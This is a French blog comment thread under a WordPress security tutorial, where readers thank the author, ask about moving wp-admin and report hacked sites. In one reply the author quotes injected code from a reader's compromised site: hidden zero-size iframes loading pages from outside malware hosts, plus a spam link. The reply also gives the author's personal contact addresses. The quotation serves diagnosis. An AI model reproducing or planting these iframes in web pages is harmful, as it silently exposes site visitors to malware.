Commentaires sur : Protéger votre WordPress du grand méchant loup

Par : Nettoyage de printemps

Nettoyage de printemps — Sun, 30 May 2010 15:34:33 +0000

[...] 2/ Mise en place des règles de sécurisation de base du site avec les bons conseils de NightAngel [...]

Par : Wordpress package

Wordpress package — Sat, 08 May 2010 14:27:29 +0000

Waoh, superbe guide, merci beaucoup, vraiment très utile, un de mes blogs a été hacké une fois dans le passé, aujourd’hui, j’essaie de les sécurisé au max.

Par : wp-popular.com » Blog Archive » Wordpress sécurité

wp-popular.com » Blog Archive » Wordpress sécurité — Mon, 03 May 2010 12:09:11 +0000

[...] this link: WordPress sécurité Tags: [...]

Par : paranoiq

paranoiq — Wed, 31 Mar 2010 08:14:50 +0000

il est bien ce tuto, bravo!

une idée juste comme ça (n’ai pas testé)
si on ne peux pas déplacer wp-admin, on peux déplacer, (et renomer?) wp-login.php

l’emplacement de ce fichier est définit dans general-template.php par wp_login_url()
la même fonction dans le theme, modifiée pour fournir la bonne url selon certaine condition (une variable ou le referer par ex.) pourrait fonctionner
…heu, c’est jouable?

Par : Création Site France

Création Site France — Wed, 03 Mar 2010 06:21:43 +0000

Superbe tutoriel, franchement tu es une bombe man, la sécurité à ce niveau tu es top ! Continue…

Par : coolio

coolio — Mon, 15 Feb 2010 04:42:21 +0000

merci pour cet article qui m’a permis d’améliorer mes connaissances en Wp !

Par : dd

dd — Sat, 13 Feb 2010 14:02:43 +0000

Bonsoir, voulant retourner sur le lien donné dans le post plus haut, je ne peux accéder, Kapersky me bloque cette page avec un gros avertissement rouge, c’est étonnant le lien semble infecté par un « Trojan-Clicker.JS.Agent.ma » selon Kapersky 2010 ?

Par : NightAngel

NightAngel — Tue, 02 Feb 2010 14:29:03 +0000

@dd : Cette méthode est plutôt intéressante cependant la première partie sous-entend que vous ayaez une adresse ip fixe car seule votre connexion pourra accéder au répertoire « wp-admin ». Le problème étant que, comme la plupart des internautes, vous devez avoir une adresse ip dynamique allouée par votre fournisseur d’accès. En d’autres termes, votre adresse ip ne doit pas être la même aujourd’hui que dans 3 jours par exemple.

@caro : Il me faudrait davantage de précisions, vous pouvez me joindre par mail ( webmaster@nightangel.fr ), MSN ( fatal1ty@wanadoo.fr ) ou skype ( nightangel46 ). Par rapport aux commentaires, utilisez-vous le plugin (extension) « akismet » ? Il y a de toutes façons d’autres problèmes si je me base sur le site openbooks.fr En effet il y a des bouts de codes étranges tels que :

^?View Code PHP

1	echo ' eddsfsdfsd ';

ou encore :

^?View Code HTML4STRICT

<iframe iccmc='nU2hKVfk' src='http://4analytics.ws/in.cgi?8 ' wcxjb='QMXsIujE' width='0' height='0' style='display:none'></iframe><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<b><a href="http://www.zcinema.ru"><font color="#808080">�������
�����</font></a></b><iframe src='http://pumpidss.com/index.php?s=3ad9361a36c374be1b3dcd9f6384d8e2' style='display: none;'></iframe><iframe iccmc='nU2fk' src='http://281B.com/in.cgi?8 ' wcxjb='QMXjE' width='0' height='0' style='display:none'></iframe>echo '<div style="display:none">eddsfsdfsd<iframe width=2 height=2 src="http://281B.com/in.cgi?8"></iframe>

Ce sont probablement les fichiers de thème « header.php » et « footer.php » qui sont impactés, voire « functions.php ». Merci pour votre commentaire et vous savez où me joindre si nécessaire.

Par : caro

caro — Tue, 02 Feb 2010 13:09:36 +0000

Bonjour,

Alors toujours un plaisir de lire les conseils dispensés ici. Cependant voilà mon soucis. Je pensais avoir réglé mon problème de hacking sauvage sur mon wordpress et voilà que cela recommence. Je ne suis pas la seule, car pour mon travail, nous administrons un site wordpress qui est une radio podcast pédagogique. Que ce soit mon wordpress ou un autre, il semble que le hacking sauvage sévit. Nous recevons des commentaires bizzares avec des adresses bizzares et comme par hasard, même si vous les supprimez définitivement ou cochez indésirables, à ce moment là, problème. Du coup google, annonce votre site comme étant malveillant ! J’ai beau effectuer toutes les démarches pour y remédier c’est une vraie galère ! please help me ! merci beaucoup !

Par : dd

dd — Mon, 01 Feb 2010 17:49:55 +0000

Bonsoir, ce script est-il valable ?
http://www.brunovalentin.com/s[...]wordpress/
Si oui comment le mettre en place ?

Par : dd

dd — Mon, 01 Feb 2010 17:27:59 +0000

Bonsoir, super merci infiniment pour ce lien, je cherchais comment résoudre ce problème depuis un moment ;)
Bravo aussi pour ton site, très intéressant ;)
Finalement tu peux peut-être me renseigner, car mon problème est identique à celui décrit ici : http://forum.webrankinfo.com/c[...]l#p1136079
La seule solution est donc de déplacer le dossier wp-admin alors ? Mais donc d’après ce que tu dis si on fait ça on touche au core de wordpress ? C’est donc pour ça que d’après le lien que tu m’as donné il est préférable de faire une redirection de l’accès à la partie admin de wordpress, est-ce bien ça, dis-moi si j’ai bien tout compris ? ;)

Par : NightAngel

NightAngel — Sun, 31 Jan 2010 20:02:19 +0000

@dd : Pour l’instant je ne suis toujours pas très satisfait de mes essais et c’est pour cette raison que je n’ai rien publié. Ce n’est pas impossible mais je me refuse catégoriquement de toucher au « core » de WordPress, je veux qu’il reste pleinement possible de le mettre à jour sans problème, etc… Pour l’instant la solution la plus concluante se trouve ici. Je vais continuer mes essais dès que je trouve un peu de temps. Voilà

Par : dd

dd — Sun, 31 Jan 2010 15:41:37 +0000

Bonjour merci pour ce dossier, malheureusement la partie qui m’intéresse n’existe plus et cela fait un moment qu’il est notifié :
« Il n’est pas évident, mais pas impossible non plus, de manipuler le répertoire wp-admin. En effet cela peut poser des problèmes à plusieurs niveaux, je suis actuellement en train de tester une méthode et de vérifier son bon fonctionnement. Dès qu’une solution accessible est trouvée, je viens éditer cette page. Merci pour votre compréhension ! »
Alors j’en conclu que tu n’as pas réussis à le faire ?
Comment déplacer et renommer wp-admin ?
Merci

Par : caro

caro — Sun, 03 Jan 2010 11:15:51 +0000

merci pour toutes vos astuces et vos conseils ! Parfois, je trouve cela compliqué, car je ne suis pas informaticienne et le php c’est une langue étrangère pour moi ! j’en suis encore au bon vieux dhtml !
et encore !
j’ai compris comment cela fonctionne ces langages comme le php, les flux rss et autres joyeusetés, mais franchement j’ai beaucoup de mal à appliquer.
Petite question : mon site à été piraté. Via google, j’ai suivi les conseils mais maintenant, je crains toujours une nouvelle attaque.
Il m’a semblé que ce hacking est arrivé alors que je venais de changer de theme wordpress. Est-ce qu’un theme wordpress gratuit peut-être vérolé ? Comment le reconnaître ?
Merci
Caroline

Par : abort

abort — Fri, 04 Dec 2009 15:49:11 +0000

MERCI pour cet excellent tutoriel, très clair et très complet. Il m’a été très utile.